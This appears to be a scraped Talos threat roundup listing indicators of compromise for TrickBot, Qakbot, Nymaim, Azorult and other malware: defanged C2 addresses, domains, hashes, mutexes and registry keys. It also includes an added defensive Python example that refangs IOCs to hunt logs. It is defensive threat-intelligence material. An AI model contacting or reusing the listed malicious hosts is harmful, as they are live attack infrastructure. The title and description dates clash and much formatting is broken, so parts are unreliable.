`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\CATALOG_ENTRIES\000000000010` (Value Name: `PackedCatalogItem`) | 31
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\CATALOG_ENTRIES\000000000009` (Value Name: `PackedCatalogItem`) | 31
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\CATALOG_ENTRIES\000000000008` (Value Name: `PackedCatalogItem`) | 31
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\CATALOG_ENTRIES\000000000007` (Value Name: `PackedCatalogItem`) | 31
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\CATALOG_ENTRIES\000000000006` (Value Name: `PackedCatalogItem`) | 31
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\CATALOG_ENTRIES\000000000005` (Value Name: `PackedCatalogItem`) | 31
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\CATALOG_ENTRIES\000000000004` (Value Name: `PackedCatalogItem`) | 31

IP Addresses contacted by malware. Does not indicate maliciousness

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`j[.]maxmind[.]com` | 31

Files and or directories created
*See JSON for more IOCs

#### File Hashes

*See JSON for more IOCs

#### Coverage

Product | Protection
---|---
AMP |
Cloudlock | N/A
CWS |
Email Security |
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid |
Umbrella | N/A
WSA | N/A

#### Screenshots of Detection

AMP and ThreatGrid detection screenshots (images not included).

* * *

## Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.

CVE-2019-0708 detected - (24000)

An attempt to exploit CVE-2019-0708 has been detected.
The vulnerability, dubbed BlueKeep, is a heap memory corruption that can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Because it can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.

Process hollowing detected - (246)

Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the child's memory is cleared and filled in with memory from the parent instead.

Kovter injection detected - (209)

A process was injected into, most likely by an existing Kovter infection. Kovter is a click-fraud Trojan that can also act as an information stealer. Kovter is also fileless malware, meaning the malicious DLL is stored inside the Windows registry and injected directly into memory using PowerShell. It can detect and report the use of monitoring software such as Wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.

Dealply adware detected - (191)

DealPly is adware that claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements into web pages. Adware has also been known to download and install malware.

Gamarue malware detected - (159)

Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
Excessively long PowerShell command detected - (101)

A PowerShell command with a very long command-line argument, which may indicate an obfuscated script, has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell-based threats.

Installcore adware detected - (88)

InstallCore is an installer that bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that displays advertising in the form of pop-ups or by injecting into browsers and adding or altering advertisements on web pages. Adware is known to sometimes download and install malware.

Special Search Offer adware - (25)

Special Search Offer adware displays unwanted advertising in the form of pop-ups or by injecting into browsers and altering advertisements on web pages. Adware has also been known to download and install malware.

Fusion adware detected - (20)

Fusion (or FusionPlayer) is an adware family that displays unwanted advertising in the form of pop-ups or by injecting into browsers and altering advertisements on web pages. Adware is known to sometimes download and install malware.

Corebot malware detected - (20)

Corebot is a Trojan with many capabilities found in other prominent families. It features a plugin system that lets it load a variety of features from the C&C server at any time. Known plugins include RAT capabilities such as taking desktop screenshots, as well as the ability to intercept and modify browser communications and steal data, especially data related to banking.
ID TALOSBLOG:1E3663A5534D173433518B5C6F3B0E66 Type talosblog Title Threat Roundup for December 6 to December 13 Published 2019-12-13T10:03:26 Modified 2019-12-13T10:03:26 CVSS 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C) Source http://feedproxy.google.com/~r/feedburner/Talos/~3/YGaS-UxoWJU/threat-roundup-1206-1213.html

Type talosblog Family blog Last seen 2020-01-24T21:27:12 CVE CVE-2019-0708
Description
Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Jan. 17 and Jan. 24. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post summarizes the threats we've observed by highlighting key behavioral characteristics and indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/blogs/1/2020/01/tru.json_.txt>) that includes the complete list of file hashes, as well as all other IOCs from this post.
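The IOC tables in this roundup print network indicators in defanged form (`95[.]181[.]198[.]151`, `teene[.]site`), and the post's own caveat is that one IOC hit is not a verdict. The following is an added example, written for this page and not code from Talos or its JSON file, of how a hunter would turn those values back into matchable indicators and score log lines against them. It takes a handful of values as printed in the TrickBot and Emotet tables below, including the CIDR entry `74[.]202[.]142[.]98/31`, and treats the public IP-lookup services listed in the TrickBot domain table as low-weight hits. The log lines, the weights, the allowlist and all function names are this example's own constructions.

```python
"""Refang the roundup's IOC notation and run it over sample logs.

Added example, not code from the Talos post or its JSON file. The IOC strings
are copied in the defanged form the roundup uses; the log lines, the scoring
weights and the benign-service allowlist are constructed for this example.
"""
import ipaddress
import re
from typing import List, Tuple

DEFANGED_DOT = re.compile(r"\[\.\]")
IPV4_TOKEN = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
HOSTNAME_TOKEN = re.compile(r"^[a-z0-9-]+(?:\.[a-z0-9-]+)+$")


def refang(ioc: str) -> str:
    """`95[.]181[.]198[.]151` -> `95.181.198.151`; backticks from the table are dropped."""
    return DEFANGED_DOT.sub(".", ioc.strip().strip("`")).lower()


# Public "what is my IP" services. They show up in the TrickBot domain table because the
# sample queried them, so a hit on one of these alone proves nothing. Constructed allowlist.
BENIGN_LOOKUP_SERVICES = {
    "checkip.amazonaws.com", "api.ipify.org", "ipinfo.io", "ident.me", "ip.anysrc.net",
    "api.ip.sb", "ipecho.net", "www.myexternalip.com", "myexternalip.com",
    "icanhazip.com", "wtfismyip.com",
}
BENIGN_WEIGHT, IOC_WEIGHT = 1, 10


class IocSet:
    """Refanged indicators split into IP networks (single hosts become /32) and hostnames."""

    def __init__(self, raw_iocs: List[str]) -> None:
        self.networks = []
        self.domains = set()
        for raw in raw_iocs:
            value = refang(raw)
            try:
                # strict=False accepts a CIDR such as 74.202.142.98/31 even if host bits are set.
                self.networks.append(ipaddress.ip_network(value, strict=False))
            except ValueError:
                self.domains.add(value)

    def matches_ip(self, ip: str) -> bool:
        addr = ipaddress.ip_address(ip)
        return any(addr in net for net in self.networks)

    def matches_domain(self, name: str) -> bool:
        return name.lower().rstrip(".") in self.domains


def score_line(line: str, iocs: IocSet) -> Tuple[int, List[str]]:
    """Score one log line: IOC hits weigh 10, benign-lookup hits weigh 1."""
    score, reasons = 0, []
    for token in line.lower().split():
        token = token.split(":")[0]  # drop a trailing :port
        if IPV4_TOKEN.match(token):
            if iocs.matches_ip(token):
                score += IOC_WEIGHT
                reasons.append(f"ip {token}")
        elif HOSTNAME_TOKEN.match(token) and iocs.matches_domain(token):
            if token in BENIGN_LOOKUP_SERVICES:
                score += BENIGN_WEIGHT
                reasons.append(f"benign lookup {token}")
            else:
                score += IOC_WEIGHT
                reasons.append(f"domain {token}")
    return score, reasons


def hunt(lines: List[str], iocs: IocSet, threshold: int = IOC_WEIGHT) -> List[Tuple[str, int, List[str]]]:
    """Return only the lines whose score reaches the threshold, with the reasons."""
    out = []
    for line in lines:
        score, reasons = score_line(line, iocs)
        if score >= threshold:
            out.append((line, score, reasons))
    return out


# Indicators as printed in the roundup tables (TrickBot IPs and domains, one Emotet CIDR).
ROUNDUP_IOCS = [
    "`95[.]181[.]198[.]151`", "`79[.]174[.]12[.]245`", "`74[.]202[.]142[.]98/31`",
    "`teene[.]site`", "`checkip[.]amazonaws[.]com`", "`api[.]ipify[.]org`",
]

# Constructed log lines; host names are invented.
SAMPLE_LOGS = [
    "ws17 dns query checkip.amazonaws.com",
    "ws17 tcp connect 95.181.198.151:443",
    "ws22 dns query teene.site",
    "ws09 tcp connect 74.202.142.99:443",
    "ws31 dns query example.com",
]

if __name__ == "__main__":
    for line, score, reasons in hunt(SAMPLE_LOGS, IocSet(ROUNDUP_IOCS)):
        print(score, line, reasons)
```

Weighting the IP-lookup services at 1 keeps them visible for correlation (the TrickBot sample below contacted several of them, which is why they sit in its domain table) without letting a single such hit page an analyst; the CIDR entry is matched as a network, so a neighbouring address inside the /31 still fires.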
As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness.

The most prevalent threats highlighted in this roundup are:

Threat Name | Type | Description
---|---|---
Win.Packed.TrickBot-7541396-1 | Packed | Trickbot is a banking trojan targeting sensitive information for certain financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts.
Win.Dropper.Qakbot-7541405-1 | Dropper | Qakbot, aka Qbot, has been around since at least 2008. Qbot primarily targets sensitive information like banking credentials but can also steal FTP credentials and spread across a network using SMB.
Win.Packed.Nymaim-7542552-1 | Packed | Nymaim is malware that can be used to deliver ransomware and other malicious payloads. It uses a domain generation algorithm to produce candidate command and control (C2) domains from which it fetches additional payloads.
Win.Malware.Azorult-7541464-1 | Malware | Azorult is a banking trojan that attempts to steal credit card data and other sensitive information to facilitate cybercrime.
Doc.Malware.Emotet-7544675-1 | Malware | Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Worm.Vobfus-7541859-0 | Worm | Vobfus is a worm that copies itself to external drives and attempts to gain automatic code execution via autorun.inf files. It also modifies the registry so that it will launch when the system is booted. Once installed, it attempts to download follow-on malware from its command and control (C2) servers.
Win.Trojan.XpertRAT-7550253-1 | Trojan | XpertRAT is a remote access trojan that gives an attacker remote access to an infected machine and can steal sensitive information such as usernames and passwords. XpertRAT has been around since 2011 and consists of a core component and multiple modules, all written in Delphi.
Win.Trojan.Upatre-7549404-0 | Trojan | Upatre is a malicious downloader often used by exploit kits and phishing campaigns. Upatre downloads and executes malicious executables, such as banking malware.
Win.Packed.Passwordstealera-7544289-0 | Packed | This malware can harvest stored credentials, keystrokes, screenshots, network activity, and more from computers where it is installed.

* * *

## Threat Breakdown

### Win.Packed.TrickBot-7541396-1

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\DAC9024F54D8F6DF94935FB1732638CA6AD77C13` (value name: Blob) | 7
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\PROFILELIST\S-1-5-21-2580483871-590521980-3826313501-500` (value name: RefCount) | 2
`<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\75E0ABB6138512271C04F85FDDDE38E4B7242EFE` (value name: Blob) | 1

Mutexes | Occurrences
---|---
`Global\316D1C7871E10` | 40

IP Addresses contacted by malware.
Does not indicate maliciousness | Occurrences \n---|--- \n`95[.]181[.]198[.]151` | 24 \n`79[.]174[.]12[.]245` | 22 \n`195[.]123[.]240[.]81` | 16 \n`185[.]62[.]188[.]83` | 12 \n`181[.]140[.]173[.]186` | 10 \n`5[.]182[.]210[.]109` | 10 \n`185[.]99[.]2[.]149` | 10 \n`85[.]143[.]219[.]230` | 10 \n`23[.]95[.]231[.]187` | 10 \n`176[.]119[.]159[.]204` | 9 \n`198[.]23[.]209[.]201` | 8 \n`5[.]2[.]76[.]122` | 8 \n`146[.]185[.]219[.]31` | 8 \n`198[.]8[.]91[.]10` | 6 \n`92[.]63[.]105[.]138` | 6 \n`5[.]182[.]211[.]44` | 6 \n`164[.]68[.]120[.]60` | 5 \n`181[.]129[.]104[.]139` | 4 \n`51[.]89[.]73[.]159` | 4 \n`216[.]239[.]38[.]21` | 3 \n`181[.]113[.]28[.]146` | 3 \n`176[.]58[.]123[.]25` | 2 \n`116[.]203[.]16[.]95` | 2 \n`52[.]44[.]169[.]135` | 2 \n`52[.]55[.]255[.]113` | 2 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`teene[.]site` | 6 \n`checkip[.]amazonaws[.]com` | 4 \n`api[.]ipify[.]org` | 3 \n`ipinfo[.]io` | 3 \n`ident[.]me` | 2 \n`ip[.]anysrc[.]net` | 2 \n`api[.]ip[.]sb` | 2 \n`ipecho[.]net` | 2 \n`2cdajlnnwxfylth4[.]onion` | 2 \n`www[.]myexternalip[.]com` | 1 \n`250[.]5[.]55[.]69[.]zen[.]spamhaus[.]org` | 1 \n`myexternalip[.]com` | 1 \n`icanhazip[.]com` | 1 \n`wtfismyip[.]com` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%System32%\\Tasks\\Task Gpu health` | 40 \n`%TEMP%\\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt` | 40 \n`%TEMP%\\<random, matching '[A-F0-9]{4,5}'>.dmp` | 40 \n`None` | 39 \n`%APPDATA%\\DirectTools\\data` | 25 \n`%APPDATA%\\DirectTools\\settings.ini` | 25 \n`%APPDATA%\\gpuhealth` | 15 \n`%APPDATA%\\gpuhealth\\data` | 15 \n`%APPDATA%\\gpuhealth\\settings.ini` | 15 \n`%APPDATA%\\DirectTools\\Data\\pwgrab64` | 2 \n`%APPDATA%\\DirectTools\\data\\pwgrab64_configs\\dpost` | 2 \n`%APPDATA%\\DirectTools\\data\\pwgrab64_configs` | 1 \n \n#### File Hashes\n\n` 0143ebd2f87acf44bf4b8dc9f03ba00e7eff4d2a723e93bfb7c628a83b993f9a 
06951826498d418e5f0ca33112d2cb607d738e9ccb08feaa1ce3427bffa22600 06fce1e6e9c3187d9cf087c6fe4034785f1ffaccbe9b500e424dcc03946a83da 0a1a547185e396fa877b82e7cbc716fe682a95588914944246f0b18c8828bf8f 0addc7b9d5e37d663277cdc9c15fa001ed5db6fa59263a5869b5aed99180ef02 0e4b9cea532791a825d4774d95580827667bff1e75f83b936d0e5cc3ab7236e6 16a0f1a7a0fe7277e4ef69b214b48a0c7f6a96fee6c78bf979b92fb97aed3c83 1f42082ee2954a70c60d15886366307ccacbb8080f03daa536e3fae361a46f4d 20ec1ae9bf3e33e2321f10cb230cc543792b94ecfaf358847b6b85e6d03af17f 297e4bd8eb28b69336a5d05abefd50985f7f5161c1bb08dd54a287a85123f856 2a1494652183e00b35e5566123fa3a2b3d73f9ac8a686258b4905a47a5354488 30b023cc4b072dfdef48929f92bbf283d112a92d03698b58b4c4fea402912c82 31ef497ec1ba5f2a858c92732416cff7bc1a1cdfaddef2ec539b09bbf9e83369 34610185ae8d7ccb60c2c536a2a1ed17be1b4741d2f88206f874276309b439ac 364252d2f0111a2d1bb24aaae430f57ae07c6209682b3567d5c99bbc73a2ce26 3826b709fd3add9b91d37828209ca8b8c05aa60ca2c34d82be1f4260b8188f83 38b5cf64a8cb8099d5c24d82ddd981f00941126c53b999906ddab7b4eff05b11 3c4bf379d34de653845d1efc59eb441388e99aa7e72137b5964d74467d58013f 3e206f84c4467a51a246ada113646b8dd79aebec8b2ecbd515434335db48f6f0 4172720904201256e209df95026384a4a46c1cd5f7910aa7d309633b747e37da 45a2a54c9228d8aef0ef8599c21b2b51bb4163aa02982a205c2fee36c9ffd5e3 47e90d2bd50809df1e9b1b8bc97883dbfa277a760914179cc8f8e54b58290852 4d13f83b56a619c0c34d5fa2fd1c3376ed3c3b837d626599983be29a0e31cc00 4d3eb4806824008f979eae543f41cc90e1e7dd47d95b70bb98984454974d0865 52e86752e9af7aec9c31ea3f3bb224ad02966c11bf7ef73e0eeaf4c247fd2a51 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### 
ThreatGrid\n\n[](<https://1.bp.blogspot.com/-IXC1NLLbMZI/XitNDG_iMSI/AAAAAAAADKU/EiPEs5oggmAuNSLeWX7POoNbaThxoGVfQCLcBGAsYHQ/s1600/45a2a54c9228d8aef0ef8599c21b2b51bb4163aa02982a205c2fee36c9ffd5e3_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.Qakbot-7541405-1\n\n#### Indicators of Compromise\n\nMutexes | Occurrences \n---|--- \n`ocmwn` | 22 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt` | 22 \n`%TEMP%\\<random, matching '[A-F0-9]{4,5}'>.dmp` | 22 \n`\\TEMP\\437d5b4d9e4c5d8ab4615871f9e7830c.exe` | 1 \n`\\TEMP\\385ece7d547122fba5d712c7495a6721.exe` | 1 \n`\\TEMP\\c09a343a545e0f9e36444a847e3ad5ac.exe` | 1 \n`\\TEMP\\c78811efdd2612e5ca25249df2cf7600.exe` | 1 \n \n#### File Hashes\n\n` 0aea1de8b679fe547239de586664d4693f8cc6cef89340b3fb161c09630f6b14 1118a488e6f39981fb9b24b1bbf3dcd9c0bde2ca79353ad231427a96e951340e 15a4c8dc1980650038b2e8823807746cadb6f106737719e8e8c14b3fcea0b8d4 1e24651cd82da5234ef6dc48f67ea123889fab0dcfe9d41c9d9e4aaba7016786 1ea2902b3b1245d195b86c48a72ea70591877f99beeb622c20bb8ec672ce2daf 298c9f7d8fb46cbf8d3d59a9b145ebbc1c27cb507e4290cd37f02e6754225ddf 2a389b7f20979df29d32ecbcfb0c290891aea90d483f29f95617c2b06dc72670 3617f78b320d1e2efa260579b7d7df9beb37fc47c4bb7d5f320d7675f18894ed 3754ca2f4e3057827092577b1385fde7f07a53f12c6ddc3d6fd5f0f9d6a1239c 457b9bd110b9ada83477e9e1b578663cc3fa5e9d8d0eea8eb41bca51ed11fe09 4c1c055f423adc3d2eed4a54602bf607ccf2562f498aca8b1f1e7e23e1054373 6e2382936ba75dc342bec4ddee3bfc1f3a608f9dfaf3146c9a23d6e3551d6e3f 8e01ab60655a87bdc2a3b56bdc84a50e1c4079555218f28ff6fdc6e1ac109e92 a73e870268c6baa9b6c1f646b7b56d96655b0e2af784be9b5de3dd618c0e8fde bec8eb12798277e788ee835a6da3873fac69a68fb9796d2f248b9b3162285869 c0a8971ffec59c7987826d4ba03fbe539263b92f90718dbdabf6cc382531e417 c78e50570a2d04460be294f5bf5626d03b21c177aa0271e0597baea65caaa2b2 ca0e1deff6b8bcdb9bd5a170529339c6582e78deaa5153db86098fe65664f7e2 
cd64755ab2a51aeeefe9afb202ddc84b7f04570271f27630eaf8ea76811937a0 d119ff32920eb407b85a23c825b67454444c0b5097deae743ab8f774f5416d28 d1c307f7b14523f3fa68fbbe0c41b39c40c3a8a27db996d4b952cb7fc183a42b dd722366c1a992ad2e014c2eacb856e76f7677acee045ed552ae3b2ee05e2e99 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-OnRG3SfoiaQ/XitNpWbndWI/AAAAAAAADKc/1kb4rDsyk74XvBr8Br7qV3AOijLiL1TMgCLcBGAsYHQ/s1600/15a4c8dc1980650038b2e8823807746cadb6f106737719e8e8c14b3fcea0b8d4_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.Nymaim-7542552-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\GOCFK ` | 15 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\GOCFK \nValue Name: mbijg ` | 15 \nMutexes | Occurrences \n---|--- \n`Local\\{369514D7-C789-5986-2D19-AB81D1DD3BA1}` | 15 \n`Local\\{D0BDC0D1-57A4-C2CF-6C93-0085B58FFA2A}` | 15 \n`Local\\{F04311D2-A565-19AE-AB73-281BA7FE97B5}` | 15 \n`Local\\{F6F578C7-92FE-B7B1-40CF-049F3710A368}` | 15 \n`Local\\{306BA354-8414-ABA3-77E9-7A7F347C71F4}` | 15 \n`Local\\{F58B5142-BC49-9662-B172-EA3D10CAA47A}` | 15 \n`Local\\{C170B740-57D9-9B0B-7A4E-7D6ABFCDE15D}` | 15 \n`Local\\{888E04DB-EDDB-D2EC-5F32-1719D74FA2E0}` | 15 \n`Local\\{D876A547-0EDD-4A55-0873-9F0D6D3719FB}` | 15 \nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`fzncuowwstw[.]pw` | 15 \n`wawrgrtjcdr[.]com` | 15 \n`ochirxt[.]net` | 15 \n`klcbberl[.]com` | 15 \n`fxcskhwr[.]in` | 15 \n`vpbcco[.]net` | 15 \n`mrbhs[.]pw` | 15 \n`wiztdyzp[.]com` | 15 \n`eqbrnmigl[.]in` | 15 \n`csuaibcneix[.]net` | 15 \n`lnulxvsvvl[.]pw` | 15 \n`szthbpsn[.]pw` | 15 \n`nokuznpxbypo[.]com` | 15 \n`tthzpuipne[.]pw` | 15 \n`juxrdizkivk[.]net` | 15 \n`hcjihn[.]in` | 1 \n`omcbnlos[.]net` | 1 \n`voxrdn[.]net` | 1 \n`zbztpauc[.]pw` | 1 \n`caojbfvum[.]net` | 1 \n`dkzexx[.]net` | 1 \n`npdcqoxaepfz[.]net` | 1 \n`ljhafrwlf[.]in` | 1 \n`vauordi[.]com` | 1 \n`bfeqxicrqaxp[.]pw` | 1 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%ProgramData%\\ph` | 15 \n`%ProgramData%\\ph\\fktiipx.ftf` | 15 \n`%TEMP%\\gocf.ksv` | 15 \n`%ProgramData%\\<random, matching '[a-z0-9]{3,7}'>` | 15 \n`%APPDATA%\\<random, matching '[a-z0-9]{3,7}'>` | 15 \n`%LOCALAPPDATA%\\<random, matching '[a-z0-9]{3,7}'>` | 15 \n`%TEMP%\\fro.dfx` | 12 \n`\\Documents and Settings\\All Users\\pxs\\pil.ohu` | 12 \n`%TEMP%\\bpnb.skg` | 1 \n`%TEMP%\\haqhxh.vsz` | 1 \n`\\Documents and Settings\\All Users\\po\\vikog.axh` | 1 \n \n#### File Hashes\n\n` 13faed74357cf5f5a66983ce864e49d8ab3d16dc0c4c04a95888fe6ff2580b5c 1e22dbdfbcafcef6e91099b7c345a52a4f59a92fe1f8d30e333bce0d92b7c850 2c22e368525024b26e7c7d1058260093a2f380373010e6e387bea75e325c613c 36799b98d45008973435f10c8e1ba40288b92d6199e4ecec16e40e918e44d58d 3f9a8d0d084d4640a73140faf01df696531c0a6d762309655c503718b412a081 4a70f8df27631b3f76c1a6d520aa53983484e442dd79155d20101fae271e98c5 63fe06736f3fe6ef3ae4c58c89cebc9f055872cab247a707490e3c4b41ca8ff7 9938f7621ae034d3b677c1dbebeb29fe57e1e8a275856aa404d2bca260c808a4 a315a6e21350c5a9811f5006b78ffc5906e5f0c2fc1ed31af8bfc7e056f12797 a66e66ef119cb1451ba006a49417432bc8700f096adff827d4ae7bf0dae07a67 acebcce1368e7a969746cae53715768a37620dc2cfd278f4cff2b891c0d9af6c 
c43573752804b8f215c95dcb4ab87985cfc87010bfe459e9ab836c8dacb86f5c ccd4a7ded8fa23a750dc9437399cdc6f84964fc0fe4106b2df67ad558014b9e9 e0e5fb674a45c8d4515294b2b591860679993da4a2c48f656f206fa874a5cb98 fd65221380cfca194a1dbd9351357ee2fd0c132784385ed1ff3141c5b19a6805 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-X26IWZcqkOs/XitOawbQKHI/AAAAAAAADKk/bwxFxGMmOGMqpgc9tAWQNoXQgOWk5MYZQCLcBGAsYHQ/s1600/9938f7621ae034d3b677c1dbebeb29fe57e1e8a275856aa404d2bca260c808a4_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Azorult-7541464-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\PICTURE ` | 20 \n`<HKCU>\\SOFTWARE\\PICTURE\\PICTUREPROCESSINGTOOLSV1.0 ` | 20 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER \nValue Name: GlobalAssocChangedCounter ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: DisplayName ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: DisplayVersion ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: VersionMajor ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: VersionMinor ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: Publisher ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: DisplayIcon ` | 10 
\n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: UninstallString ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: URLInfoAbout ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: HelpLink ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: InstallLocation ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: InstallSource ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: Language ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: NoModify ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: NoRepair ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: InstallDate ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: EstimatedSize ` | 10 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\BYTEDOWNLOAD PROTECT SERVICE ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\BYTEDOWNLOAD PROTECT SERVICE \nValue Name: Type ` | 9 